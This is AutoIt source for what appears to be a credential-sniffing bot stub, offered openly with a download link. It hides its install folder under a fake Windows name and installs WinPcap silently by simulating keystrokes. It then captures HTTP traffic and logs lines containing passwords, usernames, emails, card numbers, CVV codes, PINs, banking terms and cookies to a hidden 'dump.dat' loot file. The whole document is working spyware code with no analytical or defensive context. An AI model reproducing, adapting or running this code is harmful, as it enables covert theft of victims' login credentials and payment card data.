; MAIN STUB HERE https://anonfiles.com/Pbn1G269q0/bot_au3 #NoTrayIcon #Region ;**** Directives created by AutoIt3Wrapper_GUI **** #AutoIt3Wrapper_Outfile=stub.exe #AutoIt3Wrapper_Compression=4 #AutoIt3Wrapper_UseUpx=y #AutoIt3Wrapper_Res_Language=1033 #AutoIt3Wrapper_Res_requestedExecutionLevel=asInvoker #AutoIt3Wrapper_Run_Tidy=y #Tidy_Parameters=/gd /reel /sci 0 /kv 5 /sf #AutoIt3Wrapper_Tidy_Stop_OnError=n #AutoIt3Wrapper_Run_Au3Stripper=y #Au3Stripper_Parameters=/so /mi 5 /mo #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI **** Opt("ExpandEnvStrings", 1) Global $installdir = @AppDataDir & '\Windows Shell Common Binary' Global $lootLoc = $installdir & "\dump.dat" Global $sniffopt = "tcp port (80 or 8080 or 8888 or 8181)" Global Const $sMutex = BinaryToString("0x1337FF207F2838EEEBD6E4F2EF23323727FAEDCBECFE31263F25D4F1C6E4F0EF2A343225E9EFD0E6FF7A2B2125E4E5D0E8F137253F41FF1337") _Singleton($sMutex) If Not FileExists(@SystemDir & "\wpcap.dll") Then InetGet("https://www.winpcap.org/install/bin/WinPcap_4_1_3.exe", @TempDir & "\WinPcap_4_1_3.exe") Run(@TempDir & "\WinPcap_4_1_3.exe") WinWaitActive("WinPcap 4.1.3 Setup", "Welcome to the WinPcap") Send("!n") WinWaitActive("WinPcap 4.1.3 Setup", "License Agreement") Send("!a") WinWaitActive("WinPcap 4.1.3 Setup", "Installation options") ControlClick("WinPcap 4.1.3 Setup", "Installation options", "[CLASS:Button; INSTANCE:2]") WinWaitActive("WinPcap 4.1.3 Setup", "Completing the WinPcap") Send("!f") EndIf installPCAP() $winpcap = _PcapSetup() $pcap_devices = _PcapGetDeviceList() $iface = 0 $pcap = _PcapStartCapture($pcap_devices[$iface][0], "host " & $pcap_devices[$iface][7] & " and " & $sniffopt, 0, 65536, 2 ^ 24, 0) Dim $keywords[20] $keywords[0] = "GET /" $keywords[1] = "POST /" $keywords[2] = "Host: " $keywords[3] = "User-Agent: " $keywords[4] = "Content-" $keywords[5] = "password=" $keywords[6] = "user_name=" $keywords[7] = "user=" $keywords[8] = "Username=" $keywords[9] = "User=" $keywords[10] = "login=" $keywords[11] = "email=" $keywords[12] = "username=" $keywords[13] = "holder=" $keywords[14] = "number=" $keywords[15] = "cvv=" $keywords[16] = "pin=" $keywords[17] = "transaction" $keywords[18] = "bank" $keywords[19] = "Cookie: " $lootHandle = FileOpen($lootLoc, 1) $sPacketText = "" $oldPacketText = "" While True $aPacket = _TCP_Recv($pcap) If UBound($aPacket) > 20 Then $sPacketText = BinaryToString("0x" & $aPacket[20]) If $sPacketText = $oldPacketText Then Sleep(250) ContinueLoop EndIf If StringLen($sPacketText) > 13 Then For $key = 0 To UBound($keywords) - 1 If StringInStr($sPacketText, $keywords[$key]) Then If Dec(Hex(BinaryToString("0x" & $aPacket[14]))) = 6667 Then ExitLoop $aPacketText = StringSplit(StringReplace($sPacketText, @CR, ""), @LF) For $aPT = 1 To UBound($aPacketText) - 1 If StringInStr($aPacketText[$aPT], $keywords[$key]) Then FileWriteLine($lootHandle, $aPacketText[$aPT]) FileFlush($lootHandle) $oldPacketText = $sPacketText EndIf Next $oldPacketText = $sPacketText Else ConsoleWrite($sPacketText & @CRLF) EndIf Next EndIf EndIf $oldPacketText = $sPacketText WEnd Func _PcapGetDeviceList() Local $alldevs = DllStructCreate("ptr") Local $r = DllCall($Pcap_dll, "int:cdecl", "pcap_findalldevs_ex", "str", "rpcap://", "ptr", 0, "ptr", DllStructGetPtr($alldevs), "ptr", DllStructGetPtr($Pcap_errbuf)) If (@error > 0) Then Return -1 If $r[0] = -1 Then Return -1 Local $next = DllStructGetData($alldevs, 1) Local $list[1][14] Local $i = 0 While ($next <> 0) Local $pcap_if = DllStructCreate("ptr next;ptr name;ptr desc;ptr addresses;uint flags", $next) Local $len_name = DllCall("kernel32.dll", "int", "lstrlen", "ptr", DllStructGetData($pcap_if, 2)) Local $len_desc = DllCall("kernel32.dll", "int", "lstrlen", "ptr", DllStructGetData($pcap_if, 3)) $list[$i][0] = DllStructGetData(DllStructCreate("char[" & ($len_name[0] + 1) & "]", DllStructGetData($pcap_if, 2)), 1) $list[$i][1] = DllStructGetData(DllStructCreate("char[" & ($len_desc[0] + 1) & "]", DllStructGetData($pcap_if, 3)), 1) Local $next_addr = DllStructGetData($pcap_if, "addresses") Local $device = StringTrimLeft($list[$i][0], 8) Local $snames = DllStructCreate("char Name[" & (StringLen($device) + 1) & "]") DllStructSetData($snames, 1, $device) Local $handle = DllCall("packet.dll", "ptr:cdecl", "PacketOpenAdapter", "ptr", DllStructGetPtr($snames)) If IsPtr($handle[0]) Then Local $packetoiddata = DllStructCreate("ulong oid;ulong length;ubyte data[6]") DllStructSetData($packetoiddata, 1, 0x01010102) DllStructSetData($packetoiddata, 2, 6) Local $status = DllCall("packet.dll", "byte:cdecl", "PacketRequest", "ptr", $handle[0], "byte", 0, "ptr", DllStructGetPtr($packetoiddata)) If $status[0] Then Local $mac = DllStructGetData($packetoiddata, 3) $list[$i][6] = StringMid($mac, 3, 2) & ":" & StringMid($mac, 5, 2) & ":" & StringMid($mac, 7, 2) & ":" & StringMid($mac, 9, 2) & ":" & StringMid($mac, 11, 2) & ":" & StringMid($mac, 13, 2) EndIf Local $nettype = DllStructCreate("uint type;uint64 speed") $status = DllCall("packet.dll", "byte:cdecl", "PacketGetNetType", "ptr", $handle[0], "ptr", DllStructGetPtr($nettype)) If $status[0] Then $list[$i][5] = DllStructGetData($nettype, 2) EndIf DllCall("packet.dll", "none:cdecl", "PacketCloseAdapter", "ptr", $handle[0]) EndIf Local $pcap = _PcapStartCapture($list[$i][0], "host 1.2.3.4", 0, 32) If IsPtr($pcap) Then Local $types = _PcapGetLinkType($pcap) If IsArray($types) Then $list[$i][2] = $types[0] $list[$i][3] = $types[1] $list[$i][4] = $types[2] EndIf _PcapStopCapture($pcap) EndIf While $next_addr <> 0 Local $pcap_addr = DllStructCreate("ptr next;ptr addr;ptr netmask;ptr broadaddr;ptr dst", $next_addr) Local $j, $addr For $j = 2 To 4 $addr = _PcapSock2addr(DllStructGetData($pcap_addr, $j)) If StringLen($addr) > 15 Then $list[$i][$j + 8] = $addr ElseIf StringLen($addr) > 6 Then $list[$i][$j + 5] = $addr EndIf Next $next_addr = DllStructGetData($pcap_addr, 1) WEnd $list[$i][13] = DllStructGetData($pcap_if, 5) $next = DllStructGetData($pcap_if, 1) $i += 1 If $next <> 0 Then ReDim $list[$i + 1][14] WEnd DllCall($Pcap_dll, "none:cdecl", "pcap_freealldevs", "ptr", DllStructGetData($alldevs, 1)) Return $list EndFunc ;==>_PcapGetDeviceList Func _PcapGetLinkType($pcap) If Not IsPtr($pcap) Then Return -1 Local $type[3] Local $t = DllCall($Pcap_dll, "int:cdecl", "pcap_datalink", "ptr", $pcap) $type[0] = $t[0] Local $name = DllCall($Pcap_dll, "str:cdecl", "pcap_datalink_val_to_name", "int", $t[0]) $type[1] = $name[0] Local $desc = DllCall($Pcap_dll, "str:cdecl", "pcap_datalink_val_to_description", "int", $t[0]) $type[2] = $desc[0] Return $type EndFunc ;==>_PcapGetLinkType Func _PcapGetPacket($pcap) ; return 0: timeout, -1:error, -2:EOF in file or if successfull array[0]=time [1]=captured len [2]=packet len [3]=packet data If Not IsPtr($pcap) Then Return -1 $Pcap_ptrhdr = DllStructCreate("ptr") $Pcap_ptrpkt = DllStructCreate("ptr") Local $pk[4] Local $res = DllCall($Pcap_dll, "int:cdecl", "pcap_next_ex", "ptr", $pcap, "ptr", DllStructGetPtr($Pcap_ptrhdr), "ptr", DllStructGetPtr($Pcap_ptrpkt)) If ($res[0] <> 1) Then Return $res[0] Local $pkthdr = DllStructCreate("int s;int us;int caplen;int len", DllStructGetData($Pcap_ptrhdr, 1)) Local $packet = DllStructCreate("ubyte[" & DllStructGetData($pkthdr, 3) & "]", DllStructGetData($Pcap_ptrpkt, 1)) Local $time_t = Mod(DllStructGetData($pkthdr, 1) + $Pcap_timebias, 86400) $pk[0] = StringFormat("%02d:%02d:%02d.%06d", Int($time_t / 3600), Int(Mod($time_t, 3600) / 60), Mod($time_t, 60), DllStructGetData($pkthdr, 2)) $pk[1] = DllStructGetData($pkthdr, 3) $pk[2] = DllStructGetData($pkthdr, 4) $pk[3] = DllStructGetData($packet, 1) $Pcap_statV += $pk[2] $Pcap_statN += 1 Return $pk EndFunc ;==>_PcapGetPacket Func _PcapSendPacket($pcap, $data) ; data in Binary Format If Not IsPtr($pcap) Then Return -1 Local $databuffer = DllStructCreate("ubyte[" & BinaryLen($data) & "]") DllStructSetData($databuffer, 1, $data) Local $r = DllCall($Pcap_dll, "int:cdecl", "pcap_sendpacket", "ptr", $pcap, "ptr", DllStructGetPtr($databuffer), "int", BinaryLen($data)) Return $r[0] EndFunc ;==>_PcapSendPacket Func _PcapSetup() ; return WinPCAP version as full text or -1 if winpcap is not installed, and opens dll If Not FileExists(@SystemDir & "\wpcap.dll") Then Return -1 Global $Pcap_dll = DllOpen(@SystemDir & "\wpcap.dll") Global $Pcap_errbuf = DllStructCreate("char[256]") Global $Pcap_ptrhdr = 0 Global $Pcap_ptrpkt = 0 Global $Pcap_statV ; Total volume captured Global $Pcap_statN ; Total number of packets captured Global $Pcap_starttime ; Start time of Capture Global $Pcap_timebias = (2 ^ 32 - RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation", "ActiveTimeBias")) * 60 Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_lib_version") If (@error > 0) Then Return -1 Return $v[0] EndFunc ;==>_PcapSetup Func _PcapSock2addr($sockaddr_ptr) If ($sockaddr_ptr = 0) Then Return "" Local $sockaddr = DllStructCreate("ushort family;char data[14]", $sockaddr_ptr) Local $family = DllStructGetData($sockaddr, 1) If ($family = 2) Then Local $sockaddr_in = DllStructCreate("short family;ushort port;ubyte addr[4];char zero[8]", $sockaddr_ptr) Return DllStructGetData($sockaddr_in, 3, 1) & "." & DllStructGetData($sockaddr_in, 3, 2) & "." & DllStructGetData($sockaddr_in, 3, 3) & "." & DllStructGetData($sockaddr_in, 3, 4) EndIf If ($family = 23) Then Local $sockaddr_in6 = DllStructCreate("ushort family;ushort port;uint flow;ubyte addr[16];uint scope", $sockaddr_ptr) Local $bin = DllStructGetData($sockaddr_in6, 4) Local $i, $ipv6 For $i = 0 To 7 $ipv6 &= StringMid($bin, 3 + $i * 4, 4) & ":" Next Return StringTrimRight($ipv6, 1) EndIf Return "" EndFunc ;==>_PcapSock2addr Func _PcapStartCapture($DeviceName, $filter = "", $promiscuous = 0, $PacketLen = 65536, $buffersize = 0, $realtime = 1) Local $handle = DllCall($Pcap_dll, "ptr:cdecl", "pcap_open", "str", $DeviceName, "int", $PacketLen, "int", $promiscuous, "int", 1000, "ptr", 0, "ptr", DllStructGetPtr($Pcap_errbuf)) If (@error > 0) Then Return -1 If ($handle[0] = 0) Then Return -1 DllCall($Pcap_dll, "int:cdecl", "pcap_setnonblock", "ptr", $handle[0], "int", 1, "ptr", DllStructGetPtr($Pcap_errbuf)) If ($filter <> "") Then Local $fcode = DllStructCreate("UINT;ptr") Local $comp = DllCall($Pcap_dll, "int:cdecl", "pcap_compile", "ptr", $handle[0], "ptr", DllStructGetPtr($fcode), "str", $filter, "int", 1, "int", 0) If ($comp[0] = -1) Then Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_geterr", "ptr", $handle[0]) DllStructSetData($Pcap_errbuf, 1, "Filter: " & $v[0]) _PcapStopCapture($handle[0]) Return -1 EndIf Local $set = DllCall($Pcap_dll, "int:cdecl", "pcap_setfilter", "ptr", $handle[0], "ptr", DllStructGetPtr($fcode)) If ($set[0] = -1) Then Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_geterr", "ptr", $handle[0]) DllStructSetData($Pcap_errbuf, 1, "Filter: " & $v[0]) _PcapStopCapture($handle[0]) Return -1 DllCall($Pcap_dll, "none:cdecl", "pcap_freecode", "ptr", $fcode) EndIf EndIf If $buffersize > 0 Then DllCall($Pcap_dll, "int:cdecl", "pcap_setbuff", "ptr", $handle[0], "int", $buffersize) If $realtime Then DllCall($Pcap_dll, "int:cdecl", "pcap_setmintocopy", "ptr", $handle[0], "int", 1) $Pcap_statV = 0 $Pcap_statN = 0 $Pcap_starttime = TimerInit() Return $handle[0] EndFunc ;==>_PcapStartCapture Func _PcapStopCapture($pcap) If Not IsPtr($pcap) Then Return DllCall($Pcap_dll, "none:cdecl", "pcap_close", "ptr", $pcap) EndFunc ;==>_PcapStopCapture Func _Singleton($occurenceName, $flag = 0) Local $ERROR_ALREADY_EXISTS = 183 $occurenceName = StringReplace($occurenceName, "\", "") ; to avoid error Local $handle = DllCall("kernel32.dll", "int", "CreateSemaphore", "int", 0, "long", 1, "long", 1, "str", $occurenceName) ; Local $handle = DllCall("kernel32.dll", "int", "CreateMutex", "int", 0, "long", 1, "str", $occurenceName) Local $lastError = DllCall("kernel32.dll", "int", "GetLastError") If $lastError[0] = $ERROR_ALREADY_EXISTS Then If $flag = 0 Then Exit -1 Else SetError($lastError[0]) ;<---flag <>0 so set @error to $ERROR_ALREADY_EXISTS Return 0 EndIf EndIf Return $handle[0] EndFunc ;==>_Singleton Func _TCP_Recv($hCapture, $iInstance = 0, $iTimeOut = 3000) Local $blPacketCaptured = False, $iTimer_Capture, $aPacket, $iPacket $iTimer_Capture = TimerInit() While (TimerDiff($iTimer_Capture) < $iTimeOut Or $iTimeOut = -1) $aPacket = _PcapGetPacket($hCapture) If IsArray($aPacket) Then If $iPacket = $iInstance Then Local $aTCPPacket[21] $aTCPPacket[0] = StringMid($aPacket[3], 3, 12) ;Destination Mac Address $aTCPPacket[1] = StringMid($aPacket[3], 15, 12) ;Source Mac Address $aTCPPacket[2] = StringMid($aPacket[3], 27, 4) ;Type $aTCPPacket[3] = StringMid($aPacket[3], 31, 2) ;Version & Header length $aTCPPacket[4] = StringMid($aPacket[3], 33, 2) ;Differientiated Services Field $aTCPPacket[5] = StringMid($aPacket[3], 35, 4) ;Total Length $aTCPPacket[6] = StringMid($aPacket[3], 39, 4) ;Identification $aTCPPacket[7] = StringMid($aPacket[3], 43, 4) ;Fragment offset $aTCPPacket[8] = StringMid($aPacket[3], 47, 2) ;Time to live $aTCPPacket[9] = StringMid($aPacket[3], 49, 2) ;Protocol $aTCPPacket[10] = StringMid($aPacket[3], 51, 4) ;Header checksum $aTCPPacket[11] = StringMid($aPacket[3], 55, 8) ;Source IP Address $aTCPPacket[12] = StringMid($aPacket[3], 63, 8) ;Destination IP Address $aTCPPacket[13] = StringMid($aPacket[3], 71, 4) ;Source port $aTCPPacket[14] = StringMid($aPacket[3], 75, 4) ;Destination port $aTCPPacket[15] = StringMid($aPacket[3], 79, 8) ;Sequence number $aTCPPacket[16] = StringMid($aPacket[3], 87, 8) ;Acknowledgment number $aTCPPacket[17] = StringMid($aPacket[3], 95, 4) ;Flags $aTCPPacket[18] = StringMid($aPacket[3], 99, 4) ;Window size value $aTCPPacket[19] = StringMid($aPacket[3], 103, 4) ;Checksum $aTCPPacket[20] = StringTrimLeft($aPacket[3], 110) ;Data Return $aTCPPacket EndIf $iPacket += 1 EndIf WEnd Return -1 EndFunc ;==>_TCP_Recv Func installPCAP() DirCreate($installdir) FileSetAttrib($installdir, "+SH") EndFunc ;==>installPCAP